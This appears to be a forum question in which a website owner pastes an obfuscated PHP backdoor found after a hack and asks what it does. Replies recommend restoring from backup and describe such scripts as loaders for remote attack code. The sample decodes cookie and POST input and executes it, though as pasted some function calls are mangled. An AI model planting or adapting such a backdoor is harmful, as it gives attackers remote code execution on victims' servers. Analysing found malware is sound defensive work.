# What does this suspicious code do? website got hacked

Tags: malware

can someone tell me what this code do?

my website got hacked a few days ago and i found this suspicious php file in a sub-folder. I can see that it has been added later than all the other files, and i know it shouldn't be there. But i don't know what the code do.

```
$kfpzxtd[] = "create_function";
$kfpzxtd[] = "H*";
$kfpzxtd[] = "#";
$kfpzxtd[] = "b95d8d1b-ff38-4549-8786-5e6b337d4662";
$kfpzxtd[] = "count";
$kfpzxtd[] = "str_repeat";
$kfpzxtd[] = "explode";
$kfpzxtd[] = "substr";
$kfpzxtd[] = "array_merge";
$kfpzxtd[] = "strlen";
$kfpzxtd[] = "pack";
    foreach ("g"($_COOKIE, $_POST) as $wiylfic => $mzfvwr){
        function vqyxci($kfpzxtd, $wiylfic, $rbdhg){
        return "x"("b"($wiylfic . "r", ($rbdhg / "p"($wiylfic)) + 1), 0, $rbdhg);
    }
        function azaag($kfpzxtd, $nyupw){
        return @"k"("-", $nyupw);
    }
        function zyebtn($kfpzxtd, $nyupw){
        $ejobu = "s"($nyupw) % 3;
            if (!$ejobu) {
            $mlmly = "o";
             $uxpne = $mlmly("", "-"("9"));
            $uxpne();
        }
    }
    $mzfvwr = azaag($kfpzxtd, $mzfvwr);
    zyebtn($kfpzxtd, "4"("9", $mzfvwr ^ vqyxci($kfpzxtd, $wiylfic, "p"($mzfvwr))));
}
```

Comment: Standard advice here: number one priority is to completely reinstall the compromised server from a known good backup. Reverse engineering what the breach consists of might be interesting out of curiosity, but is not how you make your server secure. (In particular, the thing you need to worry about is how this file _got there in the first place_, not what's in it.)

Comment: I know. Backup from before the hack has already been installed, without the malicious files. i was just wondering if someone could tell me what they are trying to do...

Comment: Usually, these attack scripts turn out to be basically a bootloader which loads the full attack from somewhere else (provided at will by the attacker who knows how) and executes it.